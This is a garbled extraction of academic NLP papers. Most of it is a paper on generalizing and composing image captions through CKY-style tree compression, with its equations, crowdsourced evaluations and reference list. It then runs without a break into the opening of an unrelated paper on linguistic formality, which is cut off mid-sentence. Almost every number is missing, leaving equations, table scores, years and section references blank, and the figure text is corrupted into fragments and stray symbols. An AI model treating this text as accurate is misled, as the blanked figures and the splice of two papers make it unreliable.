al., ), naturally existing image captions often in- clude contextual information that does not directly describe visual content, which ultimately hinders their usefulness for describing other images. there- fore, to improve the fidelity of the generated descrip- tions, we explore image caption generalization as an late%in%the%day,%a,er%my%sunset%shot% a empts,%my%cat%strolled%along%the% fence%and%posed%for%this%classic%profile% late%in%the%day%%%cat%% % posed%for%this%profile% generaliza)on+ this%bridge%stands% late%in%the%day,% a,er%my%sunset%shot% a empts% a%cat% strolled%along%the%fence% and%posed%for%this%classic%profile% figure : compressed captions (on the left) are more ap- plicable for describing new images (on the right). optional pre-processing step. figure illustrates a concrete example of image caption generalization in the context of image caption generation. we cast caption generalization as sentence com- pression. we encode the problem as tree pruning via lightweight cky parsing, while also incorporating several other considerations such as leaf-level ngram cohesion scores and visually informed content selec- tion. figure shows an example compression, and figure shows the corresponding cky matrix. at a high level, the compression operation resem- bles bottom-up cky parsing, but in addition to pars- ing, we also consider deletion of parts of the trees. when deleting parts of the original tree, we might need to re-parse the remainder of the tree. note that we consider re-parsing only with respect to the orig- inal parse tree produced by a state-of-the-art parser, hence it is only a light-weight parsing. . dynamic programming input to the algorithm is a sentence, represented as a vector x = x ...xn− = x[ : n− ], and its pcfg parse π(x) obtained from the stanford parser. for simplicity of notation, we assume that both the parse tree and the word sequence are encoded in x. then, the compression can be formalized as: integrating full parsing into the original sentence would be a straightforward extension conceptually, but may not be an em- pirically better choice when parsing for compression is based on vanilla unlexicalized parsing. ŷ = arg max y ∏ i φi(x,y) ( ) where each φi is a potential function, corresponding to a criteria of the desired compression: φi(x,y) = exp(θi ·fi(x,y)) ( ) where θi is the weight for a particular criteria (de- scribed in § . ), whose scoring function is fi. we solve the decoding problem (equation ) us- ing dynamic programming. for this, we need to solve the compression sub-problems for sequences x[i : j], which can be viewed as branches ŷ[i,j] of the final tree ŷ[ : n− ]. for example, in figure , the final solution is ŷ[ : ], while a sub-solution of x[ : ] corresponds to a tree branch pp . notice that sub-solution ŷ[ : ] represents the same branch as ŷ[ : ] due to branch deletion. some computed sub-solutions, e.g., ŷ[ : ], get dropped from the final compressed tree. we define a matrix of scores d[i,j,h] (equa- tion ), where h is one of the nonterminal symbols being considered for a cell indexed by i,j, i.e. a can- didate for the root symbol of a branch ŷ[i : j]. when all values d[i,j,h] are computed, we take ĥ = arg max h d[ ,n− ,h] ( ) and backtrack to reconstruct the final compression (the exact solution to equation ). d[i,j,h] = max k ∈ [i, j) r ∈ rh    ( ) d[i,k,p] + d[k + ,j,q] +∆φ[r,ij] ( ) d[i,k,p] + ∆φ[r,ij] ( ) d[k + ,j,p] + ∆φ[r,ij] ( ) where rh = {r ∈ r : r = h → pq ∨ r = h → p}. index k determines a split point for child branches of a subtree ŷ[i : j]. for example, in the figure the split point for children of the subtree ŷ[ : ] is k = . the three cases (( ) – ( )) of the above equation correspond to the following tree pruning cases: pruning case ( ): none of the children of the cur- rent node is deleted. for example, in figures and , the pcfg rule pp → in pp , corresponding to the sequence “in black and white”, is retained. another situation that can be encountered is tree re- parsing. vintage! motorcycle! shot! done! in! black! and! white! jj! nn! nn! vbn! in! jj! jj!cc! np, nn! np! cc-jj vp, pp np! pp s dele%on! probability! rule! probability! vision! confidence! ngram! cohesion! (dele%on,)case) )) (dele%on,)case) )) k= $ figure : cky compression. both the chosen rules and phrases (blue bold font and blue solid arrows) and not chosen rules and phrases (red italic smaller font and red dashed lines) are shown. pruning case ( )/( ): deletion of the left/right child respectively. there are two types of deletion, as illustrated in figures and . the first corre- sponds to deletion of a child node. for example, the second child nn of rule np → np nn is deleted, which yields deletion of “shot”. the sec- ond type is a special case of propagating a node to a higher-level of the tree. in figure , this sit- uation occurs when deleting jj “vintage”, which causes the propagation of nn from cell to cell . for this purpose, we expand the set of rules r with additional special rules of the form h → h, e.g., nn → nn, which allows propagation of tree nodes to higher levels of the compressed tree. . modeling compression criteria the ∆φ term in equation denotes the sum of log of potential functions for each criteria q: ∆φ[r,ij] = ∑ q θ · ∆fq(r,ij) ( ) note that ∆φ depends on the current rule r, along with the historical information before the current step ij, such as the original rule rij, and ngrams on the border between left and right child branches of rule rij. we use the following four criteria fq in our model, which are demonstrated in figures and . i. tree structure: we capture pcfg rule prob- abilities estimated from the corpus as ∆fpcfg = log ppcfg(r). we assign probabilities of these special propagation rules to so that they will not affect the final parse tree score. turner and charniak ( ) handled propagation cases similarly. we use ∆ to distinguish the potential value for the whole sentence from the gain of the potential during a single step of the algorithm. jj np, nn np s vintage nn motorcycle nn shot vbn vp, pp done in pp in jj np black cc cc-jj and jj white " " " rule% probability% ngram% cohesion% dele on% probability% vision% confidence% i" j" figure : cky compression. both the chosen rules and phrases (blue bold font and blue solid arrows) and not chosen rules and phrases (red italic smaller font and red dashed lines) are shown. ii. sequence structure: we incorporate ngram cohesion scores only across the border between two branches of a subtree. iii. branch deletion probabilities: we compute probabilities of deletion for children as: ∆fdel = log p(rt|rij) = log count(rt,rij) count(rij) ( ) where count(rt,rij) is the frequency in which rij is transformed to rt by deletion of one of the children. we estimate this probability from a training corpus, described in § . . count(rij) is the count of rij in uncompressed sentences. iv. vision detection (content selection): we want to keep words referring to actual objects in the image. thus, we use v (xj), a visual similarity score, as our confidence of an object corresponding to word xj. this similarity is obtained from the vi- sual recognition predictions of (deng et al., b). note that some test instances include rules that we have not observed during training. we default to the original caption in those cases. the weights θi are set using a tuning dataset. we control over- compression by setting the weight for fdel to a small value relative to the other weights. . human compressed captions although we model image caption generalization as sentence compression, in practical applications we may want the outputs of these two tasks to be differ- ent. for example, there may be differences in what should be deleted (named entities in newswire sum- maries could be important to keep, while they may orig:"note"the"pillows,"they"match"the" chair"that"goes"with"it,"plus"the"table" in"the"picture"is"included.% seqcompression:%the"table"in"the" picture." " treepruning:"the"chair"with"the"table" in"the"picture." orig:"only"in"winter;me"we"see" these"birds"here"in"the"river." % seqcompression:"see"these"birds" in"the"river." " treepruning:"these"birds"in"the" river."" orig:"the"world's"most"powerful" lighthouse"si@ng"beside"the"house" with"the"world's"thickest"curtains." seqcompression:%si@ng"beside" the"house" " treepruning:"powerful"lighthouse" beside"the"house"with"the" curtains."" orig:"orange"cloud"on"street" light"c"near"lanakila"street" (phone"camera)." " seqcompression:%orange"street" " treepruning:"phone"camera.% relevance(problem( orig:"there's"something"about" having" "trucks"parked"in"front"of"my" house"that"makes"me"feel"all" importantclike." seqcompression:%front"of"my"house." " treepruning:"trucks"in"front"my" house.% grammar(mistakes( figure : caption generalization: good/bad examples. be extraneous for image caption generalization). to learn the syntactic patterns for caption generaliza- tion, we collect a small set of example compressed captions ( in total) using amazon mechanical turk (amt) (snow et al., ). for each image, we asked turkers to first list all visible objects in an image and then to write a compressed caption by removing not visually verifiable bits of text. we then align the original and compressed captions to mea- sure rule deletion probabilities, excluding misalign- ments, similar to knight and marcu ( ). note that we remove this dataset from the m caption cor- pus when we perform description generation. experiments we use the m captioned image corpus of ordonez et al. ( ). we reserve k images as a test set, and use the rest of the corpus for phrase extraction. we experiment with the following approaches: proposed approaches: • treepruning: our tree compression ap- proach as described in § . • seq+tree: our tree composition approach as described in § . • seq+tree+pruning: seq+tree using compressed captions of treepruning as building blocks. baselines for composition: • seq+lingrule: the most equivalent to the older sequence-driven system (kuznetsova et al., ). uses a few minor enhancements, such as sentence-boundary statistics, to im- prove grammaticality. • seq: the § system without tree models and mentioned enhancements of seq+lingrule. method bleu meteor w/ (w/o) penalty p r m seq+lingrule . ( . ) . . . seq . ( . ) . . . seq+tree . ( . ) . . . seq+pruning . ( . ) . . . seq+tree+pruning . ( . ) . . . table : automatic evaluation • seq+pruning: seq using compressed cap- tions of treepruning as building blocks. we also experiment with the compression of human written captions, which are used to generate image descriptions for the new target images. baselines for compression: • seqcompression (kuznetsova et al., ): inference operates over the sequence structure. although optimization is subject to constraints derived from dependency parse, parsing is not an explicit part of the inference structure. ex- ample outputs are shown in figure . . automatic evaluation we perform automatic evaluation using two mea- sures widely used in machine translation: bleu (pa- pineni et al., ) and meteor (denkowski and lavie, ). we remove all punctuation and con- vert captions to lower case. we use k test im- ages from the captioned image corpus, and as- sume the original captions as the gold standard cap- tions to compare against. the results in table we use the unigram nist implementation: ftp://jaguar. ncsl.nist.gov/mt/resources/mteval-v a- .tar.gz with equal weight between precision and recall in table . except for those for which image urls are broken, or cplex did not return a solution. method- method- criteria method- preferred over method- (%) all turkers turkers w/ κ > . turkers w/ κ > . image description generation seq+tree seq rel seq+tree seq gmar seq+tree seq all seq+tree+pruning seq+tree rel seq+tree+pruning seq+tree gmar seq+tree+pruning seq+tree all seq+tree seq+lingrule all seq+tree+pruning seq+lingrule all seq+tree+pruning seq+pruning all seq+tree+pruning human all image caption generalization treepruning seqcompression∗ rel table : human evaluation: posed as a binary question “which of the two options is better?” with respect to relevance (rel), grammar (gmar), and overall (all). according to pearson’s χ test, all results are statistically significant. show that both the integration of the tree structure (+tree) and the generalization of captions using tree compression (+pruning) improve the bleu score without brevity penalty significantly, while improving meteor only moderately (due to an im- provement on precision with a decrease in recall.) . human evaluation neither bleu nor meteor directly measure grammatical correctness over long distances and may not correspond perfectly to human judgments. therefore, we supplement automatic evaluation with human evaluation. for human evaluations, we present two options generated from two compet- ing systems, and ask turkers to choose the one that is better with respect to: relevance, grammar, and overall. results are shown in table with turker ratings per image. we filter out turkers based on a control question. we then compute the selec- tion rate (%) of preferring method- over method- . the agreement among turkers is a frequent concern. therefore, we vary the set of dependable users based on their cohen’s kappa score (κ) against other users. it turns out, filtering users based on κ does not make a big difference in determining the winning method. as expected, tree-based systems significantly out- perform sequence-based counterparts. for example, while -gram bleu with brevity penalty is found to cor- relate better with human judges by recent studies (elliott and keller, ), we found that this is not the case for our task. this may be due to the differences in the gold standard cap- tions. we use naturally existing ones, which include a wider range of content and style than crowd-sourced captions. seq:"a"bu&erfly"to"the"car"was"spo&ed"by" my"nine"year"old"cousin." seq+pruning:"the"bu&erflies"are" a&racted"to"the"colourful"flowers"to"the" car.+ seq+tree:"the"bu&erflies"are"a&racted"to" the"colourful"flowers"in"hope"gardens." " seq+tree+pruning:"the"bu&erflies"are" a&racted"to"the"colourful"flowers." orig:"the"bu&erflies"are"a&racted" to"the"colourful"flowers"in"hope" gardens." " seqcompression:"the"colourful" flowers." " " treepruning:"the"bu&erflies"are" a&racted"to"the"colourful"flowers." "" cap>on"generaliza>on" image"descrip>on"genera>on" figure : an example of a description preferred over hu- man gold standard. image description is improved due to caption generalization. seq+tree is strongly preferred over seq, with a selection rate of %. somewhat surprisingly, im- proved grammaticality also seems to improve rele- vance scores ( %), possibly because it is harder to appreciate the semantic relevance of automatic cap- tions when they are less comprehensible. also as expected, compositions based on pruned tree frag- ments significantly improve relevance ( – %), while slightly deteriorating grammar ( – %). notably, the captions generated by our system are preferred over the original (owner generated) cap- tions – % of the time. one such example is in- cluded in figure : “the butterflies are attracted to the colorful flowers.” additional examples (good and bad) are pro- vided in figures and . many of these captions are highly expressive while remaining semantically human:"some"flower"on"a" bar"in"a"hotel"in"grapevine," tx." " & seq+tree+pruning:"the" flower"was"so"vivid"and" a:rac<ve." highly'expressive' human:"maybe"the"most"common" bird"in"the"neighborhood,"not"just" the"most"common"water"fowl"in" the"neighborhood!" & seq+tree+pruning:"the"duck"was" having"a"feast." human:"spring"in"a"white" dress." & & seq+tree+pruning:"blue" flowers"have"no"scent." small"white"flowers"have" no"idea"what"they"are." poe c' human:"tower"bridge" london"in"black"and" white.& & & seq+tree+pruning:"the" tower"built"on"each"side." human:"this"stained"glass" window"is"in"the"porch"of" kilcash"church,"slieve"na" mon." & seq+tree+pruning:"this" window"depicts"the"church." interes ng'choice'of'verb'phrases' human:"shot"in"blackpool"on" tescos"car"park"with"use"of"a" m"candle"power"light.& & & & seq+tree+pruning:"red"car"in" the"middle"of"the"road." informa ve' figure : description generation: good examples. description preferred over human gold standard are highlighted. human:"the"floor"of"the" market"area"in"tirumala"was" decorated"with"these"rangolis." " & seq+tree+pruning:"in"a"tree" ball"from"the"ground"train" sta:on." human:"our"cat"sleeping" in"the"cot." " & seq+tree+pruning:"our" cat"is"si=ng"in"the"bird" feeder"and"actually"eats" the"sun"flower"seed." human:"my"orange"is"in"a"very" blue"state." " " & seq+tree+pruning:"just"an" apple"in"the"sky." human:"in"the"flower"bed"by" the"large"gate,"and"various" other"places"in"the"garden." " & seq+tree+pruning:"random" flowers"offered"to"me"by"two" liele"girls." seman&c(dissonance(due( to(generaliza&on(error( completely(wrong( extraneous(informa&on( vision(detec&on(error( human:"a"delighgul"clock" in"the"town"centre"of"st" helier"with"the"iconic"jersey" cow"at"the"base." & seq+tree+pruning:"not"the" clock"face"in"the"world." grammar( problems( human:"a"bueerfly"in"a" field"in"the"santa"monica" mountains." & seq+tree+pruning:" monarch"in"her"bedroom" before"the"wedding" ceremony." literally(not(relevant,(but( metaphorically(crea&ve!( figure : description generation: bad examples. plausible, thanks to the expressive, but somewhat predictable descriptions online users write about their photos. even among the bad examples (fig- ure ) one can find highly creative captions with not literal but metaphorical relevance: “monarch in her bedroom before the wedding ceremony”. the complete system captions and the original captions are available at http://ilp-cky.appspot. com/ related work sentence fusion sentence fusion has been stud- ied mostly for multi-document summarization (barzilay and mckeown, ), where redundancy across multiple sentences serves as a guideline for syntactic and semantic validity of generation. in contrast, we do not have the natural redundancy to rely upon in our task, therefore requiring the compo- sition algorithm to be intrinsically better constrained for correct sentence structures. “monarch” can be a type of butterfly. sentence compression at the core of the image caption generalization task is sentence compression. much work has considered deletion-only edits like ours (knight and marcu, ; turner and char- niak, ; cohn and lapata, ; filippova and altun, ), while recent ones explore more com- plex edits, such as substitutions, insertions and re- ordering (cohn and lapata, ). the latter gener- ally requires a larger training corpus. we leave more expressive compression as a future research work. conclusion in this paper, we have presented a novel tree com- position approach for generating expressive image descriptions. as an optional preprocessing step, we also presented a tree compression approach and re- ported the empirical benefit of using automatically compressed captions to improve image description generation. by integrating both the tree structure and the sequence structure, we have significantly im- proved the quality of composed image captions over several competitive baselines. references regina barzilay and kathleen mckeown. . sen- tence fusion for multidocument news summarization. computational linguistics, ( ): – . tamara l. berg, alexander c. berg, and jonathan shih. . automatic attribute discovery and character- ization from noisy web data. in proceedings of the th european conference on computer vision: part i, eccv’ , pages – , berlin, heidelberg. springer-verlag. thorsten brants and alex franz. . web t -gram version . in linguistic data consortium. james clarke and mirella lapata. . global infer- ence for sentence compression an integer linear pro- gramming approach. journal of artificial intelligence research, : – . trevor cohn and mirella lapata. . large margin synchronous generation and its application to sentence compression. in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing (emnlp-conll), pages – , prague, czech republic, june. association for computational lin- guistics. trevor cohn and mirella lapata. . sentence com- pression beyond word deletion. in proceedings of the nd international conference on computational lin- guistics (coling ), pages – , manchester, uk, august. coling organizing committee. navneet dalal and bill triggs. . histograms of ori- ented gradients for human detection. in proceedings of the ieee computer society conference on computer vision and pattern recognition (cvpr’ ) - volume - volume , cvpr ’ , pages – , washington, dc, usa. ieee computer society. jia deng, alexander c. berg, kai li, and fei-fei li. . what does classifying more than , image categories tell us? in eccv. jia deng, alexander c. berg, sanjeev satheesh, hao su, aditya khosla, and fei-fei li. a. large scale visual recognition challenge. in http://www.image- net.org/challenges/lsvrc/ /index. jia deng, jonathan krause, alexander c. berg, and l. fei-fei. b. hedging your bets: optimiz- ing accuracy-specificity trade-offs in large scale visual recognition. in conference on computer vision and pattern recognition. michael denkowski and alon lavie. . meteor . : automatic metric for reliable optimization and eval- uation of machine translation systems. in proceed- ings of the emnlp workshop on statistical ma- chine translation. jesse dodge, amit goyal, xufeng han, alyssa men- sch, margaret mitchell, karl stratos, kota yamaguchi, yejin choi, hal daume iii, alexander c. berg, and tamara l. berg. . detecting visual text. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics: human language technologies, pages – , montréal, canada, june. association for compu- tational linguistics. desmond elliott and frank keller. . image de- scription using visual dependency representations. in emnlp, pages – . desmond elliott and frank keller. . comparing automatic evaluation measures for image description. in acl ( ), pages – . ali farhadi, mohsen hejrati, mohammad amin sadeghi, peter young , cyrus rashtchian, julia hockenmaier, and david forsyth. . every picture tells a story: generating sentences for images. in european confer- ence on computer vision. pedro f. felzenszwalb, ross b. girshick, david mcallester, and deva ramanan. . object detec- tion with discriminatively trained part based models. ieee transactions on pattern analysis and machine intelligence, ( ): – . yansong feng and mirella lapata. . automatic caption generation for news images. ieee transac- tions on pattern analysis and machine intelligence, ( ): – . katja filippova and yasemin altun. . overcoming the lack of parallel data in sentence compression. in emnlp, pages – . ilog, inc. . ilog cplex: high-performance software for mathematical programming and optimiza- tion. see http://www.ilog.com/products/ cplex/. michael jamieson, afsaneh fazly, suzanne stevenson, sven j. dickinson, and sven wachsmuth. . us- ing language to learn structured appearance models for image annotation. ieee trans. pattern anal. mach. intell., ( ): – . dan klein and christopher d. manning. . accurate unlexicalized parsing. in proceedings of the st an- nual meeting on association for computational lin- guistics, pages – . association for computa- tional linguistics. kevin knight and daniel marcu. . statistics-based summarization - step one: sentence compression. in aaai/iaai, pages – . atsuhiro kojima, takeshi tamura, and kunio fukunaga. . natural language description of human activi- ties from video images based on concept hierarchy of actions. ijcv, . niveda krishnamoorthy, girish malkarnenkar, ray- mond j. mooney, kate saenko, and sergio guadar- rama. . generating natural-language video de- scriptions using text-mined knowledge. in aaai. alex krizhevsky, ilya sutskever, and geoffrey hinton. . imagenet classification with deep convolutional neural networks. in nips. girish kulkarni, visruth premraj, sagnik dhar, siming li, yejin choi, alexander c. berg, and tamara l. berg. . babytalk: understanding and generat- ing simple image descriptions. in conference on com- puter vision and pattern recognition. polina kuznetsova, vicente ordonez, alexander c. berg, tamara l. berg, and yejin choi. . collective generation of natural image descriptions. in proceed- ings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – , jeju island, korea, july. association for computational linguistics. polina kuznetsova, vicente ordonez, alexander c. berg, tamara l. berg, and yejin choi. . generaliz- ing image captions for image-text parallel corpus. in the st annual meeting of the association for com- putational linguistics - short papers, sofia, bulgaria, august. association for computational linguistics. thomas k. leung and jitendra malik. . recog- nizing surfaces using three-dimensional textons. in iccv, pages – . siming li, girish kulkarni, tamara l. berg, alexan- der c. berg, and yejin choi. . composing sim- ple image descriptions using web-scale n-grams. in proceedings of the fifteenth conference on compu- tational natural language learning, pages – , portland, oregon, usa, june. association for compu- tational linguistics. david g. lowe. . distinctive image features from scale-invariant keypoints. int. j. comput. vision, : – , november. rebecca mason and eugene charniak. . annota- tion of online shopping images without labeled train- ing examples. in proceedings of workshop on vision and language, atlanta, georgia, june. association for computational linguistics. rebecca mason. . domain-independent caption- ing of domain-specific images. in proceedings of the naacl hlt student research workshop, pages – , atlanta, georgia, june. association for com- putational linguistics. margaret mitchell, jesse dodge, amit goyal, kota ya- maguchi, karl stratos, xufeng han, alyssa mensch, alexander c. berg, tamara l. berg, and hal daumé iii. . midge: generating image descriptions from computer vision detections. in eacl, pages – . vicente ordonez, girish kulkarni, and tamara l. berg. . im text: describing images using million captioned photographs. in neural information pro- cessing systems (nips). kishore papineni, salim roukos, todd ward, and wei jing zhu. . bleu: a method for automatic evalua- tion of machine translation. in acl. florent perronnin, zeynep akata, zaid harchaoui, and cordelia schmid. . towards good practice in large-scale learning for image classification. in cvpr. dan roth and wen tau yih. . a linear programming formulation for global inference in natural language tasks. in proc. of the annual conference on computa- tional natural language learning (conll). rion snow, brendan o’connor, daniel jurafsky, and andrew y. ng. . cheap and fast—but is it good?: evaluating non-expert annotations for natural language tasks. in proceedings of the conference on empirical methods in natural language processing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. richard socher, andrej karpathy, quoc v. le, christo- pher d. manning, and andrew y. ng. . grounded compositional semantics for finding and de- scribing images with sentences. in transactions of the association for computational linguistics, pages – , april. jenine turner and eugene charniak. . supervised and unsupervised learning for sentence compression. in proceedings of the rd annual meeting of the association for computational linguistics (acl’ ), pages – , ann arbor, michigan, june. associa- tion for computational linguistics. jianxiong xiao, james hays, krista a. ehinger, aude oliva, and antonio torralba. . sun database: large-scale scene recognition from abbey to zoo. in cvpr. yezhou yang, ching teo, hal daume iii, and yiannis aloimonos. . corpus-guided sentence genera- tion of natural images. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , edinburgh, scot- land, uk., july. association for computational lin- guistics. benjamin z. yao, xiong yang, liang lin, mun wai lee, and song-chun zhu. . i t: image parsing to text description. proc. ieee, ( ). haonan yu and jeffrey mark siskind. . grounded language learning from video described with sen- tences. in proceedings of the st annual meeting of the association for computational linguistics (vol- ume : long papers), pages – , sofia, bulgaria, august. association for computational linguistics. an empirical analysis of formality in online communication ellie pavlick university of pennsylvania∗ epavlick@seas.upenn.edu joel tetreault yahoo labs tetreaul@yahoo-inc.com abstract this paper presents an empirical study of linguistic formality. we perform an analy- sis of humans’ perceptions of formality in four different genres. these findings are used to develop a statistical model for pre- dicting formality, which is evaluated un- der different feature settings and genres. we apply our model to an investigation of formality in online discussion forums, and present findings consistent with theories of formality and linguistic coordination. introduction language consists of much more than just con- tent. consider the following two sentences: . those recommendations were unsolicited and undesirable. . that’s the stupidest suggestion ever. both sentences communicate the same idea, but the first is substantially more formal. such stylistic differences often have a larger impact on how the hearer understands the sentence than the literal meaning does (hovy, ). full natural language understanding requires comprehending this stylistic aspect of meaning. to enable real advancements in dialog systems, information extraction, and human-computer interaction, computers need to understand the entirety of what humans say, both the literal and the non-literal. in this paper, we focus on the ∗ research performed while at yahoo labs. particular stylistic dimension illustrated above: formality. formality has long been of interest to linguists and sociolinguists, who have observed that it subsumes a range of dimensions of style in- cluding serious-trivial, polite-casual, and level of shared knowledge (irvine, ; brown and fraser, ). the formal-informal dimension has even been called the “most important di- mension of variation between styles” (heylighen and dewaele, ). a speaker’s level of formal- ity can reveal information about their familiar- ity with a person, opinions of a topic, and goals for an interaction (hovy, ; endrass et al., ). as a result, the ability to recognize for- mality is an integral part of dialogue systems (mairesse, ; mairesse and walker, ; battaglino and bickmore, ), sociolinguistic analyses (danescu-niculescu-mizil et al., ; justo et al., ; krishnan and eisenstein, ), human-computer interaction (johnson et al., ; khosmood and walker, ), summa- rization (sidhaye and cheung, ), and au- tomatic writing assessment (felice and deane, ). formality can also indicate context- independent, universal statements (heylighen and dewaele, ), making formality detection relevant for tasks such as knowledge base popu- lation (suh et al., ; reiter and frank, ) and textual entailment (dagan et al., ). this paper investigates formality in online written communication. the contributions are as follows: ) we provide an analysis of humans’ subjective perceptions of formality in four dif- ferent genres. we highlight areas of high and low agreement and extract patterns that consis- transactions of the association for computational linguistics, vol. , pp. – , . action editor: janyce wiebe and kristina toutanova. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. tently differentiate formal from informal text. ) we develop a state-of-the-art statistical model for predicting formality at the sentence level, evaluate the model’s performance against hu- man judgments, and compare differences in the effectiveness of features across genres. ) we apply our model to analyze language use in on- line debate forums. our results provide new ev- idence in support of theories of linguistic coordi- nation, underlining the importance of formality for language generation systems. ) we release our new dataset of , sentences annotated for formality level. related work there is no generally agreed upon definition as to what constitutes formal language. some de- fine formality in terms of situational factors, such as social distance and shared knowledge (sigley, ; hovy, ; lahiri et al., ). other recent work adopts a less abstract defi- nition which is similar to the notion of “noisy text”– e.g. use of slang and poor grammar (mosquera and moreda, a; peterson et al., ). as a result, many rules have been ex- plored for recognizing and generating informal language. some of these rules are abstract, such as the level of implicature (heylighen and de- waele, ; lahiri, ) or the degree of sub- jectivity (mosquera and moreda, a), while others are much more concrete, such as the num- ber of adjectives (fang and cao, ) or use of contractions (abu sheikha and inkpen, ). much prior work on detecting formality has focused on the lexical level (brooke et al., ; brooke and hirst, ; pavlick and nenkova, ). for larger units of text, perhaps the best-known method for measuring formality is the f-score (heylighen and dewaele, ), which is based on relative part-of-speech fre- quencies. f-score and its more recent variants (li et al., ) provide a coarse measure of for- mality, but are designed to work at the genre- level, making them less reliable for shorter units of text such as sentences (lahiri, ). exist- we use special font to denote heylighen and de- waele’s f-score to avoid confusion with f measure. ing statistical approaches to detecting formal- ity (abu sheikha and inkpen, ; peterson et al., ; mosquera and moreda, b) have treated the problem as a binary classification task and relied heavily on word lists to differen- tiate the two classes. linguistics literature sup- ports treating formality as a continuum (irvine, ; heylighen and dewaele, ), as has been done in studies of other pragmatic dimensions such as politeness (danescu-niculescu-mizil et al., ) and emotiveness (walker et al., ). lahiri et al. ( ) provided a preliminary in- vestigation of annotating formality on an ordi- nal scale and released a dataset of sentence-level formality annotations (lahiri, ), but did not use their data in any computational tasks. this paper extends prior work by (i) introducing a statistical regression model of formality which is based on an empirical analysis of human per- ceptions rather than on heuristics and (ii) by applying that model to a linguistic analysis of online discussions. human perceptions of formality before we can automatically recognize formal- ity, we need an understanding of what it means for language to be formal or informal. as we discussed in section , a number of theories ex- ist with no clear consensus. in this work, we do not attempt to develop a concrete definition of formality, but instead take a bottom-up ap- proach in which we assume that each individual has their own definition of formality. this ap- proach of using unguided human judgments has been suggested by sigley ( ) as one of the most reliable ways to get a gold-standard mea- sure of formality, and has been applied in prior computational linguistics studies of pragmatics (danescu-niculescu-mizil et al., ; lahiri, ). we aim to answer: do humans’ individual intuitions collectively provide a coherent notion of formality (§ . )? and, if so, which linguistic factors contribute to this notion (§ . )? . data and annotation since formality varies substantially across gen- res (li et al., ), we look at text from four different genres: news, blogs, emails, and com- (a) answers (µ=- . ,σ= . ) (b) blogs (µ= . ,σ= . ) (c) emails (µ= . ,σ= . ) (d) news (µ= . ,σ= . ) figure : distribution of sentence-level formality scores by genre. answers . that is in addition to any customs duties that may be assessed. answers - . (lol) jus kidding...the answer to your question is gas prices!!! news . baghdad is a city of surprising topiary sculptures: leafy ficus trees are carved in geometric spirals, balls, arches and squares, as if to impose order on a chaotic sprawl. news - . he bought and bought and never stopped. table : examples of formal (positive) and informal (negative) sentences in different genres. scores are taken as the mean of human judgments on a scale from - to . munity question answering forums (henceforth “answers”). lahiri ( ) released a corpus of sentence-level formality annotations, which contains , news and , blog sentences. in addition we take a random sample of , sentences from professional emails and , sentences from yahoo answers. we follow the protocol used in lahiri ( ) in order to gather judgments on amazon mechanical turk for the email and answers data. specifically, we use a -point likert scale, with labels from - (very informal) to (very formal). so as not to bias the annotators with our own no- tions of formality, we provide only a brief de- scription of formal language and encourage an- notators to follow their instincts when making their judgments. we use the mean of anno- tators’ scores as the overall formality score for each sentence. our newly collected annotations have been made public. for more information on the annotation, please refer to the supple- http://americanbridgepac.org/ jeb-bushs-gubernatorial-email-archive/ https://answers.yahoo.com/ in total, we had annotators, meaning each anno- tator labeled sentences on average. http://www.seas.upenn.edu/~nlp/resources/ formality-corpus.tgz mentary material to this paper. . analysis figure shows the distribution of mean formal- ity scores for the sentences in each of our genres. we see that news is the most formal of our do- mains and answers is the least. however, we can see anecdotally (table ) that the standard of what constitutes “informal” depends heavily on the genre: an informal sentence from news is much more formal than one from answers. we can also see clear differences in the variance of sentence formalities within each genre. in gen- eral, the interactive genres (email and answers) show a much flatter distribution than do the in- formational genres (news and blogs). inter-annotator agreement. we want to know whether individuals’ intuitions about for- mal language result in a coherent collective no- tion of formality. to quantify this, we measure whether annotators’ ordinal ratings of formality are well correlated and whether their categor- ical judgments are in agreement. for the for- mer, we use intraclass correlation (icc) which http://www.seas.upenn.edu/~epavlick/papers/ formality_supplement.pdf we report the average raters absolute agreement (icc k) using the psych package in r: https://cran. http://americanbridgepac.org/jeb-bushs-gubernatorial-email-archive/ http://americanbridgepac.org/jeb-bushs-gubernatorial-email-archive/ https://answers.yahoo.com/ http://www.seas.upenn.edu/~nlp/resources/formality-corpus.tgz http://www.seas.upenn.edu/~nlp/resources/formality-corpus.tgz http://www.seas.upenn.edu/~epavlick/papers/formality_supplement.pdf http://www.seas.upenn.edu/~epavlick/papers/formality_supplement.pdf https://cran.r-project.org/web/packages/psych/psych.pdf , , , , formal i would trust the social workers to make the appropriate case by case determination . - ,- ,- ,- ,- informal * what the world needs is only more of u & ur smile ! ! - ,- , ,- , mixed governor, if this was intentionally done, whoever did it has at least one vote to go to hell. - , , , , neutral you should try herbal peppermint tea. table : examples of sentences with different patterns of agreement. numbers show the list of scores assigned by the annotators. some sentences exhibit “mixed” formality, i.e. workers were split on whether to call the sentence generally informal or generally formal, while others are “neutral,” i.e. workers agreed the sentence was neither formal nor informal. is similar to pearson ρ but accounts for the fact that we have different groups of annotators for each sentence. for the latter, we use a quadratic weighted κ, which is a variation of cohen’s κ better fit for measuring agreement on ordinal scales. when using crowdsourced labels, com- puting reliable measures of κ is difficult since, for a given pair of annotators, the number of items for which both provided a label is likely small. we therefore simulate two annotators as follows. for each sentence, we randomly choose one annotator’s label to be the label of annota- tor and we take the mean label of the other annotators, rounded to the nearest integer, to be the label of annotator . we then compute κ for these two simulated annotators. we repeat this process , times, and report the median and % confidence interval (table ). n icc weighted κ answers , . ± . . ± . blog , . ± . . ± . email , . ± . . ± . news , . ± . . ± . table : annotator agreement measured by in- traclass correlation (icc) and categorical agree- ment (quadratic weighted κ) for each genre. agreement is reasonably strong across genres, with the exception of news, which appears to be the most difficult to judge. table sheds light on the types of sentences that receive high and low levels of agreement. at the extreme ends r-project.org/web/packages/psych/psych.pdf weighted κ penalizes large disagreements more than small disagreements. e.g. if annotator labels a sen- tence as − and annotator labels it − , this is penal- ized less than if annotator chooses − and annotator chooses + . of the spectrum where agreement is very high (mean scores near − and + ), we see sentences which are unambiguously formal or informal. however, in the middle (mean scores near ) we see both high and low agreement sentences. high agreement sentences tend to be “neutral,” i.e. annotators agree they are neither formal nor informal, while the low-agreement sentences tend to exhibit “mixed” formality, i.e. they con- tain both formal and informal sub-sentential ele- ments. we leave the topic of sub-sentential for- mality for future work, and instead allow our use of the mean score to conflate mixed formal- ity with 